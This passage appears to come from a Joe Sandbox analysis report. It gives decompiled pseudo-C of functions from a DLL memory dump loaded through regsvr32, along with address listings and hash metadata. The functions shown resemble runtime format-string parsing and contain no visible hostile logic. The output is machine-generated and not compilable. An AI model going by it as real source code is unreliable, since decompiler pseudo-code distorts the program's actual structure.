                                                                      				E00000001180027AE4(0, __rcx, __rcx, _t271, _t273);
                                                                      				goto 0x8001ff7c;
                                                                      				if (E00000001180020418(0, _t169, __rcx, __rcx, _t271, _t273) != 0) goto 0x8001ff87;
                                                                      				goto 0x80020206;
                                                                      				if ( *((char*)(__rcx + 0x38)) != 0) goto 0x80020203;
                                                                      				_t148 =  *(__rcx + 0x28);
                                                                      				_v72 = 0;
                                                                      				_v70 = 0;
                                                                      				if ((r13b & 0) == 0) goto 0x8001ffd4;
                                                                      				if ((r13b & 0) == 0) goto 0x8001ffb9;
                                                                      				_v72 = 0x2d;
                                                                      				goto 0x8001ffd1;
                                                                      				if ((r13b & _t148) == 0) goto 0x8001ffc4;
                                                                      				_v72 = 0x2b;
                                                                      				goto 0x8001ffd1;
                                                                      				if ((r13b & 0) == 0) goto 0x8001ffd4;
                                                                      				_v72 = 0x20;
                                                                      				_t260 = _t284;
                                                                      				r8b =  *((intOrPtr*)(__rcx + 0x39));
                                                                      				if ((r8b - sil & 0x000000df) != 0) goto 0x8001fff1;
                                                                      				if ((r13b & _t148 >> 0x00000005) == 0) goto 0x8001fff1;
                                                                      				r9b = r13b;
                                                                      				goto 0x8001fff4;
                                                                      				r9b = 0;
                                                                      				_t132 = r8b - r14b;
                                                                      				if (r9b != 0) goto 0x80020008;
                                                                      				if ((r8b - r14b & 0xffffff00 | (_t132 & 0x000000df) == 0x00000000) == 0) goto 0x80020023;
                                                                      				 *((char*)(_t273 + _t260 - 0x20)) = 0x30;
                                                                      				if (r8b == sil) goto 0x80020017;
                                                                      				if (r8b != r14b) goto 0x8002001a;
                                                                      				dil = sil;
                                                                      				 *((intOrPtr*)(_t273 + _t260 - 0x1f)) = dil;
                                                                      				_t172 =  *((intOrPtr*)(__rcx + 0x2c)) -  *((intOrPtr*)(__rcx + 0x48));
                                                                      				if ((_t148 & 0x0000000c) != 0) goto 0x8002008f;
                                                                      				r9d = 0;
                                                                      				if (_t172 <= 0) goto 0x8002008f;
                                                                      				_t277 =  *((intOrPtr*)(__rcx + 0x460));
                                                                      				if ( *((intOrPtr*)(_t277 + 0x10)) !=  *((intOrPtr*)(_t277 + 8))) goto 0x8002005e;
                                                                      				if ( *((char*)(_t277 + 0x18)) == 0) goto 0x80020056;
                                                                      				goto 0x80020059;
                                                                      				 *(__rcx + 0x20) =  *(__rcx + 0x20) + 0x00000001 | 0xffffffff;
                                                                      				goto 0x80020082;
                                                                      				 *(__rcx + 0x20) = __rcx + 1;
                                                                      				 *((intOrPtr*)(_t277 + 0x10)) =  *((intOrPtr*)(_t277 + 0x10)) + _t284;
                                                                      				 *((char*)( *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x460)))))) = 0x20;
                                                                      				 *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x460)))) =  *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x460)))) + _t284;
                                                                      				if ( *(__rcx + 0x20) == 0xffffffff) goto 0x8002008f;
                                                                      				r9d = r9d + r13d;
                                                                      				if (r9d - _t172 < 0) goto 0x8002003a;
                                                                      				_t60 = _t247 + 0x20; // 0x98
                                                                      				_t269 = _t60;
                                                                      				r8d = 0;
                                                                      				_v88 =  *((intOrPtr*)(__rcx + 8));
                                                                      				_t62 = _t247 + 0x460; // 0x4d8
                                                                      				_t285 = _t62;
                                                                      				_t252 = _t285;
                                                                      				E00000001180012494(__rcx + 1, _t169, _t172, __rcx, _t252, _t269, _t271, _t273, _t269);
                                                                      				_t153 =  *(__rcx + 0x28);
                                                                      				if ((r13b & _t153 >> 0x00000003) == 0) goto 0x80020118;
                                                                      				if ((r13b & _t153 >> 0x00000002) != 0) goto 0x80020118;
                                                                      				r8d = 0;
                                                                      				if (_t172 <= 0) goto 0x80020118;
                                                                      				_t263 =  *_t285;
                                                                      				if ( *((intOrPtr*)(_t263 + 0x10)) !=  *((intOrPtr*)(_t263 + 8))) goto 0x800200f1;
                                                                      				if ( *((char*)(_t263 + 0x18)) == 0) goto 0x800200ea;
                                                                      				goto 0x800200ed;
                                                                      				 *_t269 =  *_t269 + 0x00000001 | 0xffffffff;
                                                                      				goto 0x8002010b;
                                                                      				 *_t269 = _t252 + 1;
                                                                      				 *((intOrPtr*)(_t263 + 0x10)) =  *((intOrPtr*)(_t263 + 0x10)) + _t284;
                                                                      				 *((char*)( *((intOrPtr*)( *_t285)))) = 0x30;
                                                                      				 *((intOrPtr*)( *_t285)) =  *((intOrPtr*)( *_t285)) + _t284;
                                                                      				if ( *_t269 == 0xffffffff) goto 0x80020118;
                                                                      				r8d = r8d + r13d;
                                                                      				if (r8d - _t172 < 0) goto 0x800200d3;
                                                                      				if ( *((char*)(__rcx + 0x4c)) == 0) goto 0x8002018a;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x48)) <= 0) goto 0x8002018a;
                                                                      				r14d = 0;
                                                                      				_t79 =  &_v68; // -27
                                                                      				r9d =  *( *(__rcx + 0x40)) & 0x0000ffff;
                                                                      				_t80 =  &_v72; // -31
                                                                      				_v72 = _v72 & 0x00000000;
                                                                      				r8d = 6;
                                                                      				_v88 =  *((intOrPtr*)(__rcx + 8));
                                                                      				if (E0000000118003E4FC( *((intOrPtr*)(__rcx + 8)), __rcx, _t80, _t79, _t273, _t277) != 0) goto 0x80020185;
                                                                      				r8d = _v72;
                                                                      				if (r8d == 0) goto 0x80020185;
                                                                      				_v88 =  *((intOrPtr*)(_t247 + 8));
                                                                      				_t140 = E00000001180012494(_t139, _t169, _t172, _t247, _t285, _t269, _t271, _t273, _t269);
                                                                      				r14d = r14d + r13d;
                                                                      				if (r14d !=  *(_t247 + 0x48)) goto 0x8002012b;
                                                                      				goto 0x800201a6;
                                                                      				 *_t269 =  *_t269 | 0xffffffff;
                                                                      				goto 0x800201a6;
                                                                      				r8d =  *(_t247 + 0x48);
                                                                      				_t256 = _t285;
                                                                      				_v88 =  *((intOrPtr*)(_t247 + 8));
                                                                      				E00000001180012494(_t140, _t169, _t172, _t247, _t256, _t269, _t271, _t273, _t269);
                                                                      				_t159 =  *_t269;
                                                                      				if (_t159 < 0) goto 0x80020203;
                                                                      				if ((r13b &  *(_t247 + 0x28) >> 0x00000002) == 0) goto 0x80020203;
                                                                      				r8d = 0;
                                                                      				if (_t172 <= 0) goto 0x80020203;
                                                                      				_t267 =  *_t285;
                                                                      				if ( *((intOrPtr*)(_t267 + 0x10)) !=  *((intOrPtr*)(_t267 + 8))) goto 0x800201dc;
                                                                      				if ( *((char*)(_t267 + 0x18)) == 0) goto 0x800201d5;
                                                                      				goto 0x800201d8;
                                                                      				 *_t269 = _t159 + 0x00000001 | 0xffffffff;
                                                                      				goto 0x800201f6;
                                                                      				 *_t269 = _t256 + 1;
                                                                      				 *((intOrPtr*)(_t267 + 0x10)) =  *((intOrPtr*)(_t267 + 0x10)) + _t284;
                                                                      				 *((char*)( *((intOrPtr*)( *_t285)))) = 0x20;
                                                                      				 *((intOrPtr*)( *_t285)) =  *((intOrPtr*)( *_t285)) + _t284;
                                                                      				if ( *_t269 == 0xffffffff) goto 0x80020203;
                                                                      				r8d = r8d + r13d;
                                                                      				if (r8d - _t172 < 0) goto 0x800201be;
                                                                      				return E00000001180002FB0(r13b,  *_t269, _v56 ^ _t275);
                                                                      			}

































                                                                      0x18001fe64
                                                                      0x18001fe64
                                                                      0x18001fe64
                                                                      0x18001fe69
                                                                      0x18001fe6e
                                                                      0x18001fe7c
                                                                      0x18001fe7f
                                                                      0x18001fe83
                                                                      0x18001fe8d
                                                                      0x18001fe91
                                                                      0x18001fe94
                                                                      0x18001fe97
                                                                      0x18001fe9d
                                                                      0x18001fea0
                                                                      0x18001fea3
                                                                      0x18001fea6
                                                                      0x18001fea8
                                                                      0x18001feaa
                                                                      0x18001feb3
                                                                      0x18001febb
                                                                      0x18001febf
                                                                      0x18001fec7
                                                                      0x18001fecf
                                                                      0x18001fed4
                                                                      0x18001fed8
                                                                      0x18001fedc
                                                                      0x18001fee4
                                                                      0x18001feec
                                                                      0x18001fef1
                                                                      0x18001fef6
                                                                      0x18001fefb
                                                                      0x18001ff00
                                                                      0x18001ff05
                                                                      0x18001ff09
                                                                      0x18001ff0d
                                                                      0x18001ff11
                                                                      0x18001ff15
                                                                      0x18001ff19
                                                                      0x18001ff1d
                                                                      0x18001ff21
                                                                      0x18001ff26
                                                                      0x18001ff2a
                                                                      0x18001ff2c
                                                                      0x18001ff31
                                                                      0x18001ff33
                                                                      0x18001ff3a
                                                                      0x18001ff41
                                                                      0x18001ff43
                                                                      0x18001ff4e
                                                                      0x18001ff50
                                                                      0x18001ff54
                                                                      0x18001ff5c
                                                                      0x18001ff61
                                                                      0x18001ff63
                                                                      0x18001ff68
                                                                      0x18001ff6a
                                                                      0x18001ff70
                                                                      0x18001ff75
                                                                      0x18001ff7e
                                                                      0x18001ff82
                                                                      0x18001ff8b
                                                                      0x18001ff91
                                                                      0x18001ff96
                                                                      0x18001ff9c
                                                                      0x18001ffa7
                                                                      0x18001ffb1
                                                                      0x18001ffb3
                                                                      0x18001ffb7
                                                                      0x18001ffbc
                                                                      0x18001ffbe
                                                                      0x18001ffc2
                                                                      0x18001ffcb
                                                                      0x18001ffcd
                                                                      0x18001ffd1
                                                                      0x18001ffd4
                                                                      0x18001ffe0
                                                                      0x18001ffea
                                                                      0x18001ffec
                                                                      0x18001ffef
                                                                      0x18001fff1
                                                                      0x18001fff7
                                                                      0x180020002
                                                                      0x180020006
                                                                      0x180020008
                                                                      0x180020010
                                                                      0x180020015
                                                                      0x180020017
                                                                      0x18002001a
                                                                      0x180020028
                                                                      0x18002002e
                                                                      0x180020030
                                                                      0x180020035
                                                                      0x18002003a
                                                                      0x180020049
                                                                      0x180020050
                                                                      0x180020054
                                                                      0x180020059
                                                                      0x18002005c
                                                                      0x180020061
                                                                      0x180020064
                                                                      0x180020072
                                                                      0x18002007c
                                                                      0x180020085
                                                                      0x180020087
                                                                      0x18002008d
                                                                      0x180020093
                                                                      0x180020093
                                                                      0x180020097
                                                                      0x18002009a
                                                                      0x18002009f
                                                                      0x18002009f
                                                                      0x1800200a9
                                                                      0x1800200b0
                                                                      0x1800200b5
                                                                      0x1800200c0
                                                                      0x1800200c8
                                                                      0x1800200ca
                                                                      0x1800200cf
                                                                      0x1800200d3
                                                                      0x1800200de
                                                                      0x1800200e4
                                                                      0x1800200e8
                                                                      0x1800200ed
                                                                      0x1800200ef
                                                                      0x1800200f4
                                                                      0x1800200f6
                                                                      0x180020100
                                                                      0x180020106
                                                                      0x18002010e
                                                                      0x180020110
                                                                      0x180020116
                                                                      0x18002011c
                                                                      0x180020122
                                                                      0x180020128
                                                                      0x18002012f
                                                                      0x180020133
                                                                      0x180020138
                                                                      0x18002013c
                                                                      0x180020145
                                                                      0x18002014b
                                                                      0x180020157
                                                                      0x180020159
                                                                      0x180020160
                                                                      0x18002016d
                                                                      0x180020175
                                                                      0x18002017a
                                                                      0x180020181
                                                                      0x180020183
                                                                      0x180020185
                                                                      0x180020188
                                                                      0x180020191
                                                                      0x180020195
                                                                      0x18002019c
                                                                      0x1800201a1
                                                                      0x1800201a6
                                                                      0x1800201aa
                                                                      0x1800201b5
                                                                      0x1800201b7
                                                                      0x1800201bc
                                                                      0x1800201be
                                                                      0x1800201c9
                                                                      0x1800201cf
                                                                      0x1800201d3
                                                                      0x1800201d8
                                                                      0x1800201da
                                                                      0x1800201df
                                                                      0x1800201e1
                                                                      0x1800201eb
                                                                      0x1800201f1
                                                                      0x1800201f9
                                                                      0x1800201fb
                                                                      0x180020201
                                                                      0x18002022f

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e7f09b5071435a52c98caf451e31895feb8896bce99ee709c8baf5fa94329572
                                                                      • Instruction ID: 100703a6d96d901757a7938c8ffc95e74487ef425197c19ce7ffad99ffb1f5aa
                                                                      • Opcode Fuzzy Hash: e7f09b5071435a52c98caf451e31895feb8896bce99ee709c8baf5fa94329572
                                                                      • Instruction Fuzzy Hash: A3D19132600B4C86FBBB8B2984403ED67A1E70DBC8F64821AEE55477D6DF75CA5AC740
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 55%
                                                                      			E0000000118001F4C0(signed int __esi, long long __rbx, void* __rcx, signed int __rbp, void* __r8, long long _a16, long long _a24) {
                                                                      				long long _v32;
                                                                      				long long _v40;
                                                                      				void* __rdi;
                                                                      				void* __rsi;
                                                                      				signed int _t115;
                                                                      				void* _t120;
                                                                      				signed int _t123;
                                                                      				signed int _t136;
                                                                      				signed int _t138;
                                                                      				void* _t141;
                                                                      				signed int _t143;
                                                                      				signed int _t152;
                                                                      				void* _t165;
                                                                      				intOrPtr _t175;
                                                                      				intOrPtr* _t177;
                                                                      				intOrPtr* _t188;
                                                                      				intOrPtr* _t193;
                                                                      				void* _t196;
                                                                      				void* _t198;
                                                                      				intOrPtr _t206;
                                                                      				intOrPtr _t208;
                                                                      				void* _t210;
                                                                      				void* _t214;
                                                                      				void* _t216;
                                                                      				signed int _t217;
                                                                      				void* _t222;
                                                                      
                                                                      				_t222 = __r8;
                                                                      				_t217 = __rbp;
                                                                      				_t198 = __rcx;
                                                                      				_a16 = __rbx;
                                                                      				_a24 = __rbp;
                                                                      				_t175 =  *((intOrPtr*)(__rcx + 8));
                                                                      				_t143 = __esi | 0xffffffff;
                                                                      				_t196 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x460)) != __rbp) goto 0x8001f4f7;
                                                                      				 *((char*)(_t175 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t175 + 0x2c)) = 0x16;
                                                                      				goto 0x8001f833;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x10)) != __rbp) goto 0x8001f52d;
                                                                      				 *((char*)(_t175 + 0x30)) = 1;
                                                                      				r9d = 0;
                                                                      				 *((intOrPtr*)(_t175 + 0x2c)) = 0x16;
                                                                      				r8d = 0;
                                                                      				_v32 =  *((intOrPtr*)(__rcx + 8));
                                                                      				_v40 = __rbp;
                                                                      				E0000000118003AA20( *((intOrPtr*)(__rcx + 8)), __rcx, __rcx, _t210, _t216, __rbp, __r8);
                                                                      				goto 0x8001f7e1;
                                                                      				 *((intOrPtr*)(_t198 + 0x468)) =  *((intOrPtr*)(_t198 + 0x468)) + 1;
                                                                      				if ( *((intOrPtr*)(_t198 + 0x468)) == 2) goto 0x8001f7de;
                                                                      				_t177 =  *((intOrPtr*)(_t196 + 0x10));
                                                                      				 *((intOrPtr*)(_t196 + 0x48)) = 0;
                                                                      				 *(_t196 + 0x24) = bpl;
                                                                      				r8b =  *_t177;
                                                                      				 *((long long*)(_t196 + 0x10)) = _t177 + 1;
                                                                      				 *((intOrPtr*)(_t196 + 0x39)) = r8b;
                                                                      				if (r8b == 0) goto 0x8001f7cb;
                                                                      				r9b = r8b;
                                                                      				if ( *(_t196 + 0x20) < 0) goto 0x8001f7c0;
                                                                      				_t22 = _t222 - 0x20; // -16
                                                                      				if (_t22 - 0x5a > 0) goto 0x8001f58f;
                                                                      				goto 0x8001f592;
                                                                      				_t115 =  *(0x8005f0d0 + (r8b - 0x20 + (r8b - 0x20) * 8 + r8b - 0x20) * 2) & 0x000000ff;
                                                                      				 *(_t196 + 0x24) = _t115;
                                                                      				if (_t115 - 8 >= 0) goto 0x8001f820;
                                                                      				_t152 = _t115;
                                                                      				if (_t152 == 0) goto 0x8001f6cf;
                                                                      				if (_t152 == 0) goto 0x8001f6b8;
                                                                      				if (_t152 == 0) goto 0x8001f669;
                                                                      				if (_t152 == 0) goto 0x8001f632;
                                                                      				if (_t152 == 0) goto 0x8001f62a;
                                                                      				if (_t152 == 0) goto 0x8001f600;
                                                                      				if (_t152 == 0) goto 0x8001f5f6;
                                                                      				if (_t115 - 0xfffffffffffffffc != 1) goto 0x8001f84c;
                                                                      				E0000000118001FE64(_t141, _t196, _t196, _t214, _t216);
                                                                      				goto 0x8001f65c;
                                                                      				E0000000118001FCE0(_t196);
                                                                      				goto 0x8001f65c;
                                                                      				if (r8b == 0x2a) goto 0x8001f614;
                                                                      				E0000000118001FBEC(_t196, _t196, _t196 + 0x30, _t216);
                                                                      				goto 0x8001f65c;
                                                                      				 *((long long*)(_t196 + 0x18)) =  *((long long*)(_t196 + 0x18)) + 8;
                                                                      				_t136 =  *( *((intOrPtr*)(_t196 + 0x18)) - 8);
                                                                      				_t137 =  <  ? _t143 : _t136;
                                                                      				 *(_t196 + 0x30) =  <  ? _t143 : _t136;
                                                                      				goto 0x8001f65a;
                                                                      				 *(_t196 + 0x30) = 0;
                                                                      				goto 0x8001f7a2;
                                                                      				if (r8b == 0x2a) goto 0x8001f63e;
                                                                      				goto 0x8001f60a;
                                                                      				 *((long long*)(_t196 + 0x18)) =  *((long long*)(_t196 + 0x18)) + 8;
                                                                      				_t138 =  *( *((intOrPtr*)(_t196 + 0x18)) - 8);
                                                                      				 *(_t196 + 0x2c) = _t138;
                                                                      				if (_t138 >= 0) goto 0x8001f65a;
                                                                      				 *(_t196 + 0x28) =  *(_t196 + 0x28) | 0x00000004;
                                                                      				 *(_t196 + 0x2c) =  ~_t138;
                                                                      				if (1 == 0) goto 0x8001f84c;
                                                                      				goto 0x8001f7a2;
                                                                      				if (r8b == 0x20) goto 0x8001f6af;
                                                                      				if (r8b == 0x23) goto 0x8001f6a6;
                                                                      				if (r8b == 0x2b) goto 0x8001f69d;
                                                                      				if (r8b == 0x2d) goto 0x8001f694;
                                                                      				if (r8b != 0x30) goto 0x8001f7a2;
                                                                      				 *(_t196 + 0x28) =  *(_t196 + 0x28) | 0x00000008;
                                                                      				goto 0x8001f7a2;
                                                                      				 *(_t196 + 0x28) =  *(_t196 + 0x28) | 0x00000004;
                                                                      				goto 0x8001f7a2;
                                                                      				 *(_t196 + 0x28) =  *(_t196 + 0x28) | 0x00000001;
                                                                      				goto 0x8001f7a2;
                                                                      				 *(_t196 + 0x28) =  *(_t196 + 0x28) | 0x00000020;
                                                                      				goto 0x8001f7a2;
                                                                      				 *(_t196 + 0x28) =  *(_t196 + 0x28) | 0x00000002;
                                                                      				goto 0x8001f7a2;
                                                                      				 *(_t196 + 0x28) = _t217;
                                                                      				 *(_t196 + 0x38) = bpl;
                                                                      				 *(_t196 + 0x30) = _t143;
                                                                      				 *((intOrPtr*)(_t196 + 0x34)) = 0;
                                                                      				 *(_t196 + 0x4c) = bpl;
                                                                      				goto 0x8001f7a2;
                                                                      				 *(_t196 + 0x4c) = bpl;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(_t196 + 8)) + 0x28)) != bpl) goto 0x8001f6ec;
                                                                      				_t120 = E00000001180006E80( *((intOrPtr*)(_t196 + 0x18)), _t196,  *((intOrPtr*)(_t196 + 8)), _t196 + 0x2c, _t216);
                                                                      				r8b =  *((intOrPtr*)(_t196 + 0x39));
                                                                      				r9b = r8b;
                                                                      				_t165 = _t120 - _t143;
                                                                      				if (_t165 < 0) goto 0x8001f763;
                                                                      				if (_t165 == 0) goto 0x8001f763;
                                                                      				_t206 =  *((intOrPtr*)(_t196 + 0x460));
                                                                      				if ( *((intOrPtr*)(_t206 + 0x10)) !=  *((intOrPtr*)(_t206 + 8))) goto 0x8001f72a;
                                                                      				if ( *((intOrPtr*)(_t206 + 0x18)) == bpl) goto 0x8001f725;
                                                                      				 *(_t196 + 0x20) =  *(_t196 + 0x20) + 1;
                                                                      				goto 0x8001f748;
                                                                      				 *(_t196 + 0x20) = _t143;
                                                                      				goto 0x8001f748;
                                                                      				 *(_t196 + 0x20) =  *(_t196 + 0x20) + 1;
                                                                      				 *((long long*)(_t206 + 0x10)) =  *((long long*)(_t206 + 0x10)) + 1;
                                                                      				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t196 + 0x460)))))) = r8b;
                                                                      				 *((long long*)( *((intOrPtr*)(_t196 + 0x460)))) =  *((long long*)( *((intOrPtr*)(_t196 + 0x460)))) + 1;
                                                                      				_t188 =  *((intOrPtr*)(_t196 + 0x10));
                                                                      				r9b =  *_t188;
                                                                      				 *((long long*)(_t196 + 0x10)) = _t188 + 1;
                                                                      				 *((intOrPtr*)(_t196 + 0x39)) = r9b;
                                                                      				if (r9b == 0) goto 0x8001f7f4;
                                                                      				_t208 =  *((intOrPtr*)(_t196 + 0x460));
                                                                      				if ( *((intOrPtr*)(_t208 + 0x10)) !=  *((intOrPtr*)(_t208 + 8))) goto 0x8001f784;
                                                                      				if ( *((intOrPtr*)(_t208 + 0x18)) == bpl) goto 0x8001f77f;
                                                                      				 *(_t196 + 0x20) =  *(_t196 + 0x20) + 1;
                                                                      				goto 0x8001f7a2;
                                                                      				 *(_t196 + 0x20) = _t143;
                                                                      				goto 0x8001f7a2;
                                                                      				 *(_t196 + 0x20) =  *(_t196 + 0x20) + 1;
                                                                      				 *((long long*)(_t208 + 0x10)) =  *((long long*)(_t208 + 0x10)) + 1;
                                                                      				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t196 + 0x460)))))) = r9b;
                                                                      				 *((long long*)( *((intOrPtr*)(_t196 + 0x460)))) =  *((long long*)( *((intOrPtr*)(_t196 + 0x460)))) + 1;
                                                                      				_t193 =  *((intOrPtr*)(_t196 + 0x10));
                                                                      				r8b =  *_t193;
                                                                      				 *((long long*)(_t196 + 0x10)) = _t193 + 1;
                                                                      				r9b = r8b;
                                                                      				 *((intOrPtr*)(_t196 + 0x39)) = r8b;
                                                                      				if (r8b != 0) goto 0x8001f56c;
                                                                      				_t123 =  *(_t196 + 0x24);
                                                                      				if (_t123 == 0) goto 0x8001f7cb;
                                                                      				if (_t123 != 7) goto 0x8001f820;
                                                                      				 *((intOrPtr*)(_t196 + 0x468)) =  *((intOrPtr*)(_t196 + 0x468)) + 1;
                                                                      				if ( *((intOrPtr*)(_t196 + 0x468)) != 2) goto 0x8001f547;
                                                                      				return  *(_t196 + 0x20);
                                                                      			}





























                                                                      0x18001f4c0
                                                                      0x18001f4c0
                                                                      0x18001f4c0
                                                                      0x18001f4c0
                                                                      0x18001f4c5
                                                                      0x18001f4d2
                                                                      0x18001f4d6
                                                                      0x18001f4db
                                                                      0x18001f4e5
                                                                      0x18001f4e7
                                                                      0x18001f4eb
                                                                      0x18001f4f2
                                                                      0x18001f4fb
                                                                      0x18001f4fd
                                                                      0x18001f501
                                                                      0x18001f504
                                                                      0x18001f50b
                                                                      0x18001f514
                                                                      0x18001f51b
                                                                      0x18001f520
                                                                      0x18001f528
                                                                      0x18001f52d
                                                                      0x18001f53a
                                                                      0x18001f547
                                                                      0x18001f54b
                                                                      0x18001f54e
                                                                      0x18001f552
                                                                      0x18001f558
                                                                      0x18001f55c
                                                                      0x18001f563
                                                                      0x18001f569
                                                                      0x18001f56f
                                                                      0x18001f575
                                                                      0x18001f57b
                                                                      0x18001f58d
                                                                      0x18001f5a3
                                                                      0x18001f5a8
                                                                      0x18001f5ad
                                                                      0x18001f5b5
                                                                      0x18001f5b7
                                                                      0x18001f5c0
                                                                      0x18001f5c9
                                                                      0x18001f5d2
                                                                      0x18001f5d7
                                                                      0x18001f5dc
                                                                      0x18001f5e1
                                                                      0x18001f5e6
                                                                      0x18001f5ef
                                                                      0x18001f5f4
                                                                      0x18001f5f9
                                                                      0x18001f5fe
                                                                      0x18001f604
                                                                      0x18001f60d
                                                                      0x18001f612
                                                                      0x18001f614
                                                                      0x18001f61d
                                                                      0x18001f622
                                                                      0x18001f625
                                                                      0x18001f628
                                                                      0x18001f62a
                                                                      0x18001f62d
                                                                      0x18001f636
                                                                      0x18001f63c
                                                                      0x18001f63e
                                                                      0x18001f647
                                                                      0x18001f64a
                                                                      0x18001f64f
                                                                      0x18001f651
                                                                      0x18001f657
                                                                      0x18001f65e
                                                                      0x18001f664
                                                                      0x18001f66d
                                                                      0x18001f673
                                                                      0x18001f679
                                                                      0x18001f67f
                                                                      0x18001f685
                                                                      0x18001f68b
                                                                      0x18001f68f
                                                                      0x18001f694
                                                                      0x18001f698
                                                                      0x18001f69d
                                                                      0x18001f6a1
                                                                      0x18001f6a6
                                                                      0x18001f6aa
                                                                      0x18001f6af
                                                                      0x18001f6b3
                                                                      0x18001f6b8
                                                                      0x18001f6bc
                                                                      0x18001f6c0
                                                                      0x18001f6c3
                                                                      0x18001f6c6
                                                                      0x18001f6ca
                                                                      0x18001f6d3
                                                                      0x18001f6db
                                                                      0x18001f6e0
                                                                      0x18001f6e5
                                                                      0x18001f6e9
                                                                      0x18001f6f0
                                                                      0x18001f6f2
                                                                      0x18001f707
                                                                      0x18001f709
                                                                      0x18001f718
                                                                      0x18001f71e
                                                                      0x18001f720
                                                                      0x18001f723
                                                                      0x18001f725
                                                                      0x18001f728
                                                                      0x18001f72a
                                                                      0x18001f72d
                                                                      0x18001f73b
                                                                      0x18001f745
                                                                      0x18001f748
                                                                      0x18001f74c
                                                                      0x18001f752
                                                                      0x18001f756
                                                                      0x18001f75d
                                                                      0x18001f763
                                                                      0x18001f772
                                                                      0x18001f778
                                                                      0x18001f77a
                                                                      0x18001f77d
                                                                      0x18001f77f
                                                                      0x18001f782
                                                                      0x18001f784
                                                                      0x18001f787
                                                                      0x18001f795
                                                                      0x18001f79f
                                                                      0x18001f7a2
                                                                      0x18001f7a6
                                                                      0x18001f7ac
                                                                      0x18001f7b0
                                                                      0x18001f7b3
                                                                      0x18001f7ba
                                                                      0x18001f7c0
                                                                      0x18001f7c5
                                                                      0x18001f7c9
                                                                      0x18001f7cb
                                                                      0x18001f7d8
                                                                      0x18001f7f3

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorLast
                                                                      • String ID:
                                                                      • API String ID: 1452528299-0
                                                                      • Opcode ID: 959c3a152993656e375c2ae19d8b6381fb0b85547e34f10b5f1e5d7ff9a0da6f
                                                                      • Instruction ID: 56697cec8655010b3b450f4ce3798c4104096bd872d4ec3f3a0b4c91421ef1c8
                                                                      • Opcode Fuzzy Hash: 959c3a152993656e375c2ae19d8b6381fb0b85547e34f10b5f1e5d7ff9a0da6f
                                                                      • Instruction Fuzzy Hash: 7DB16D72208F5885E7B68F39C0543BD3BA0F34DB88F298119EA4A473A5CF35C659D745
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 47%
                                                                      			E0000000118003D290(void* __rax, long long __rbx, unsigned int* __rcx, void* __rdx, void* __rdi, long long __rsi, void* __r8, void* __r9, long long _a8, long long _a16, intOrPtr _a40, intOrPtr _a48, void* _a64, long long _a80) {
                                                                      				long long _v48;
                                                                      				signed long long _v56;
                                                                      				long long _t37;
                                                                      				long long _t44;
                                                                      				unsigned int* _t49;
                                                                      				void* _t51;
                                                                      				void* _t58;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_a16 = __rsi;
                                                                      				_t58 = __r8;
                                                                      				_t49 = __rcx;
                                                                      				if (__rdx != 0) goto 0x8003d2e0;
                                                                      				_t44 = _a80;
                                                                      				_v48 = _t44;
                                                                      				 *((char*)(_t44 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t44 + 0x2c)) = __rdx + 0x16;
                                                                      				_v56 = _v56 & 0x00000000;
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				E0000000118003AA20(__rax, __rbx, _t44, __rdx, __rsi, _t51, __r8);
                                                                      				goto 0x8003d54f;
                                                                      				if (_t58 != 0) goto 0x8003d300;
                                                                      				_t37 = _a80;
                                                                      				_v48 = _t37;
                                                                      				 *((char*)(_t37 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t37 + 0x2c)) = 0x16;
                                                                      				goto 0x8003d2c4;
                                                                      				if (__r9 == 0) goto 0x8003d2e5;
                                                                      				if (_a40 == 0) goto 0x8003d2e5;
                                                                      				if (_a48 == 0x41) goto 0x8003d32b;
